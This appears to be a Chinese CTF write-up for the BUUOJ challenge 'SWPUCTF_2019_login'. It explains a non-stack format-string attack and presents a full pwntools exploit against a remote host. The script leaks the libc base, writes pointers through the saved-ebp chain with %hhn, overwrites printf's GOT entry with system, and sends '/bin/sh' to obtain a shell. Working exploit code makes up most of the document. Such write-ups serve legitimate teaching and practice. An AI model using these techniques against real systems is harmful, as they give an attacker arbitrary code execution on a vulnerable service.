思路
这题经典的非栈上格式化字符串,之前做了一道堆的,现在这道是往bss段写
但都要借助栈上保存的 ebp 指针链做二级指针：%6$p 所在槽里存的是 %10$p 所在槽的地址，%10$p 所在槽里又存着更高一个槽的地址。用 %6$hhn 改掉前者的最低字节，就能让 %10$hhn 的写入地址逐字节移动——格式化字符串本身不在栈上，目标地址没法直接作为参数放进去，只能这样间接导向。
题目 GOT 表可写、没有 canary、也没有 PIE（地址无偏移），所以思路是先泄露 libc 基址，再把 printf 的 GOT 项改写成 system，最后输入 "/bin/sh" 触发。
泄露比较简单：%15$p 直接打印出栈上返回到 __libc_start_main 内部的地址，减去固定偏移 0xf1 得到 __libc_start_main，再减去 libc 中的符号偏移就是基址（可以顺手检查基址是否页对齐，不对齐说明 libc 版本或偏移错了）。
写地址时要注意不要用 %n 一次写完 4 字节：那需要一次输出上亿个字符，远程会超时/丢数据。改用 %hhn 逐字节写，每次最多输出 256 个字符（要写 0x00 时宽度填 256，因为 %0c 仍会输出 1 个字符）。另外 %6$hhn 只能改指针的最低字节，所以要保证 stack_10 的低字节加上 7 不进位，否则指针会反向偏移，应重连换一个栈布局。
EXP
from pwn import *
# Connection and binary handles.  Switch to the commented-out process() line
# (and enable debug logging) when reproducing locally under gdb.
HOST, PORT = 'node4.buuoj.cn', 28591
BINARY = "./SWPUCTF_2019_login"
LIBC = './libc-2.27-32.so'   # the remote's libc build; its base is recovered from a leak

# p = process(BINARY)
p = remote(HOST, PORT)
# context.log_level = 'debug'

elf = ELF(BINARY)   # target binary: source of the GOT entry addresses used as absolute values below
libc = ELF(LIBC)    # symbol offsets for __libc_start_main / system
# Thin I/O wrappers over the tube so the exploit body reads as a plain
# sequence of sends and leaks.  `sa`/`sla` coerce the payload with str(),
# so ints can be passed directly.

def s(data):
    """Send *data* raw, without a trailing newline."""
    return p.send(data)


def sa(text, data):
    """Wait until *text* is received, then send str(*data*)."""
    return p.sendafter(text, str(data))


def sl(data):
    """Send *data* followed by a newline."""
    return p.sendline(data)


def sla(text, data):
    """Wait until *text* is received, then send str(*data*) plus a newline."""
    return p.sendlineafter(text, str(data))


def r(num=4096):
    """Receive up to *num* bytes."""
    return p.recv(num)


def ru(text):
    """Receive up to and including *text*."""
    return p.recvuntil(text)


def uu32():
    """Read up to the next 0xf7 byte and unpack the last 4 bytes as a
    little-endian 32-bit value (assumes the leaked pointer's top byte is 0xf7)."""
    return u32(p.recvuntil("\xf7")[-4:].ljust(4, "\x00"))


def uu64():
    """64-bit counterpart: wait (at most 1 s) for a 0x7f byte and unpack the
    last 6 bytes, zero-extended to 8."""
    return u64(p.recvuntil("\x7f", timeout=1)[-6:].ljust(8, "\x00"))


def lg(name, data):
    """Log *data* as a hex address labelled *name*."""
    return p.success(name + "-> 0x%x" % data)
def dbg():
    """Attach gdb to the tube; intended for the local process() run."""
    gdb.attach(p)
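# --- leak libc --------------------------------------------------------------
# The format string lives in .bss, so we can only read what is already on the
# stack: argument 15 holds a return address inside __libc_start_main.
LIBC_START_MAIN_RET_OFF = 0xf1   # distance from that return address to the
                                 # __libc_start_main symbol in libc-2.27-32.so


def _read_hex():
    """Return the next '0x...' value the target prints, parsed as an int."""
    p.recvuntil('0x')
    return int(p.recvuntil('\n'), 16)


sla('Please input your name: ', 'mo')
sla('Please input your password: ', '%15$p')
libc_start_main = _read_hex() - LIBC_START_MAIN_RET_OFF
lg('libc_start_main', libc_start_main)
libc_base = libc_start_main - libc.sym['__libc_start_main']
lg('libc_base', libc_base)
if libc_base & 0xfff:
    # libc is mapped page-aligned; a misaligned base means the wrong libc
    # build or a wrong return-address offset, and every address derived
    # below would be off.
    p.warning('libc_base is not page-aligned: wrong libc build or offset?')
system_addr = libc_base + libc.sym['system']
lg('system', system_addr)
printf_got = elf.got['printf']  # 0x804b014
lg('printf_got', printf_got)

# Two stack slots that the rest of the exploit relies on forming a chain:
# the value at slot 6 is the address of slot 10, and the value at slot 10 is
# the address of slot 14.  Patching the low byte of slot 6's value via
# %6$hhn therefore changes where %10$hhn writes, which is how a .bss format
# string reaches an arbitrary address.
sla('Try again!', '%6$p')
stack_6 = _read_hex()
lg('stack_6', stack_6)
sla('Try again!', '%10$p')
stack_10 = _read_hex()
lg('stack_10', stack_10)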
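# --- stage printf@got on the stack ------------------------------------------
# Write printf_got into stack slot 14 and printf_got + 1 into slot 15, one
# byte at a time, through the ebp chain: %6$hhn patches the low byte of the
# pointer in slot 10 so that it points at stack_10 + i, then %10$hhn stores
# the i-th byte there.  Those two slots become the targets of %14$hhn and
# %15$hn in the final write.  The bytes are derived from printf_got instead
# of being hard-coded (0x14 0xb0 0x04 0x08 only matched this one binary).
slot10_low = stack_10 & 0xFF
if slot10_low + 7 > 0xFF:
    # %6$hhn only patches the lowest byte of the pointer, so stack_10 + i
    # must not carry into the next byte; otherwise the pointer wraps
    # backwards and the writes corrupt the wrong part of the stack.
    # Reconnect for a different stack layout instead of continuing.
    raise RuntimeError('stack_10 low byte 0x%02x would carry past 0xff; rerun' % slot10_low)

staged = [(printf_got >> (8 * i)) & 0xFF for i in range(4)]          # -> slot 14
staged += [((printf_got + 1) >> (8 * i)) & 0xFF for i in range(4)]   # -> slot 15
for i, byte in enumerate(staged):
    if i:
        # Move the slot-10 pointer to stack_10 + i.  For i == 0 slot 10
        # already holds stack_10 itself, so no adjustment is needed.
        sla('Try again!\n', '%' + str(slot10_low + i) + 'c%6$hhn')
    # %hhn stores the number of characters printed so far modulo 256.  A
    # width of 0 would still print one character, so a zero byte is
    # written with a width of 256 (256 % 256 == 0).
    sla('Try again!\n', '%' + str(byte or 0x100) + 'c%10$hhn')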
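# --- overwrite printf@got with system ---------------------------------------
# Restore the slot-10 pointer to stack_10 (+0) now that staging is done.
sla('Try again!\n', '%' + str(stack_10 & 0xFF) + 'c%6$hhn')

# Slot 14 holds printf_got and slot 15 holds printf_got + 1, so a single
# format string writes the low byte with %14$hhn and the next two bytes with
# %15$hn.  The top byte of the GOT entry is not written: it already holds a
# libc address and is assumed to match system's top byte.
low = system_addr & 0xFF
mid = (system_addr >> 8) & 0xFFFF
first = low or 0x100   # %0c still prints one char; a width of 256 makes %hhn store 0
# %hn stores the *total* count printed so far, so the second width is the
# distance from `first` to `mid` modulo 2**16 - not a fixed constant such as
# -0x10, which only holds when system's low byte happens to be 0x10 in the
# libc build in use.  A zero distance is printed as 65536 for the same
# reason as above.
second = (mid - first) % 0x10000 or 0x10000
pl = '%' + str(first) + 'c%14$hhn'
pl += '%' + str(second) + 'c%15$hn'
sla('Try again!\n', pl)

# The next "password" is passed to printf(buf), which now resolves to system.
sla('Try again!\n', '/bin/sh\x00')
p.interactive()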